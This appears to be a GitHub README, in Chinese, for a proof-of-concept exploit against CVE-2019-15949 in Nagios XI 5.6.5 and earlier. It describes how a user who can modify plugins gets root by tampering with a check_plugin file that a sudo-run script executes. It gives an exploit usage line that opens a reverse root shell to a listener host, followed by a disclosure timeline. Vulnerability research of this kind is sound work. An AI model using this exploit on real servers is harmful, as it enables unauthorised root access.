plur1bu5/Nagios-CVE-2019-15949-RCE
GitHub: plur1bu5/Nagios-CVE-2019-15949-RCE
针对 Nagios XI 5.6.5 及以下版本 CVE-2019-15949 远程代码执行漏洞的 Python 验证脚本,通过插件管理权限实现 root 提权。
Stars: 0 | Forks: 0
# Nagios-CVE-2019-15949-RCE-Poc
针对 CVE-2019-15949 的 Python PoC
## 概述
Nagios XI <= 5.6.5 中存在一个漏洞,允许攻击者利用 RCE 将权限提升至 root。
该漏洞利用需要以 'nagios' 用户身份访问服务器,或者通过 Web 界面访问 CCM 并拥有管理插件的权限。
## 详情
在下载系统配置文件 (profile.php?cmd=download) 时会调用 getprofile.sh 脚本,该脚本通过无需密码的 sudo 条目以 root 权限执行;该脚本会执行 'check_plugin' 可执行文件,而该文件归 nagios 用户所有。登录 Nagios XI 并拥有修改插件权限的用户,或者服务器上的 'nagios' 用户,可以修改 'check_plugin' 可执行文件并注入恶意命令,这些命令将以 root 权限执行。
## POC
已开发出一个 PHP POC,它上传一个 payload 从而实现反弹 root shell。
用法:
```python3 exploit.py targetIp [ssl=false/true] username password Lhost lport```
示例:
```python3 exploit.py 10.10.11.9 false nagiosadmin admin 10.10.11.14 4444```
## 披露
向 Nagios 报告时间:2019 年 7 月 29 日
Nagios 确认时间:2019 年 7 月 29 日
修复版本:5.6.6,发布于:2019 年 8 月 20 日
CVE 分配时间:2019 年 9 月 6 日 (CVE-2019-15949 https://nvd.nist.gov/vuln/detail/CVE-2019-15949)
标签:Capture The Flag, CSV导出, CVE-2019-15949, Exploit-Dev, Nagios XI, Nagios 漏洞, PE 加载器, Python PoC, RCE, Root Shell, Web报告查看器, 协议分析, 本地提权, 权限提升, 编程工具, 网络安全, 远程代码执行, 逆向Shell, 隐私保护